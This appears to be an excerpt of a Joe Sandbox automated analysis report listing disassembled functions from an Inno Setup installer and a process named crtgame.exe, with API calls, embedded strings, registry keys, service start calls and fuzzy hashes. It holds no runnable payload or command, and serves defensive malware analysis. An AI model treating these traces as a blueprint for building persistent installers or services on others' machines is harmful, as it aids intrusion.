Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99

Function 00481938 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981

Strings

Will not restart Windows automatically., xrefs: 00481AA0

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E

Function 00424950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00424975
WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49

Strings

+qI, xrefs: 00424A02, 00424A0C, 00424A5B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CursorMessageWait
String ID: +qI
API String ID: 4021538199-4068327824
Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D

Function 0046BC48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
Failed to proceed to next wizard page; aborting., xrefs: 0046BD57

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A

Function 00477940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
%s\%s_is1, xrefs: 004779B8

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58

Function 0044F988 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E

Strings

open, xrefs: 0044FA41

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58

Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

), xrefs: 004025AE

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: )
API String ID: 2227675388-1084416617
Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD

Function 00494F8A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5

Strings

/INITPROCWND=$%x , xrefs: 00494FF0
@, xrefs: 00494F90

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98

Function 00446C68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

SysFreeString.OLEAUT32(?), ref: 00446D1A

Strings

NIL Interface Exception, xrefs: 00446CBC
Unknown Method, xrefs: 00446CF3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E

Function 004947FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881

Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778

Strings

D, xrefs: 00494844

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: D
API String ID: 3798668922-2746444292
Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628

Function 0042DC8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0

Strings

Inno Setup: No Icons, xrefs: 0042DC9E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E

Function 004964C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0047BB30: FreeLibrary.KERNEL32(74A90000,0047FFE2), ref: 0047BB46

Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C

Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523

Strings

Detected restart. Removing temporary directory., xrefs: 004964D7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD

Function 00496BAD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04

Strings

$pI, xrefs: 004969A5, 004969B2, 00496BAD, 00496A03
.lst, xrefs: 004969A8
/REGU, xrefs: 004968ED
Setup, xrefs: 00496903
oI, xrefs: 00496C1E
.msg, xrefs: 0049698E
Inno-Setup-RegSvr-Mutex, xrefs: 00496921
oI, xrefs: 004968B9, 004968C6, 004968DD, 004968EA, 0049697E, 00496988, 00496998, 004969A2
/REG, xrefs: 004968C9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseDeleteFileHandleMutexRelease
String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
API String ID: 3841931355-3392794427
Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C

Function 00421D38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
GetFocus.USER32 ref: 00421D69

Strings

+qI, xrefs: 00421D39

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Focus
String ID: +qI
API String ID: 2734777837-4068327824
Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C

Function 00456C04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28

Strings

$pI, xrefs: 00456C23

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Time$FileSystem
String ID: $pI
API String ID: 2086374402-3761944556
Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C

Function 00454B90 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00454BAF
Sleep.KERNEL32(?), ref: 00454BBF
GetLastError.KERNEL32 ref: 00454BD2
GetLastError.KERNEL32 ref: 00454BDC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

Analysis Process: crtgame.exePID: 1472, Parent PID: 5476COMMON

Execution Graph

Execution Coverage:	21.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.3%
Total number of Nodes:	400
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004026F0 Relevance: 57.9, APIs: 26, Strings: 7, Instructions: 196
registrystringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
ExitProcess.KERNEL32 ref: 004027D9
lstrcmpiW.KERNEL32(?,00407108,?,00000000), ref: 004027FB
RegCreateKeyExA.KERNELBASE(80000002,Software\TLGraphicsMode,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
GetTickCount.KERNEL32 ref: 0040284D
wsprintfA.USER32 ref: 00402865
RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
RegCloseKey.KERNELBASE(?), ref: 00402891
StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040295F

Strings

TAudioClass, xrefs: 004026FE, 00402736
C:\Program Files (x86)\CRTGame\crtgame.exe, xrefs: 0040271A, 00402724, 00402788, 004027AD, 004027CA
test, xrefs: 004027A8
Software\TLGraphicsMode, xrefs: 00402820, 004028BC
tac1210%d, xrefs: 0040285F, 004028F7
/chk, xrefs: 00402776
TAudioClass, xrefs: 00402731

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
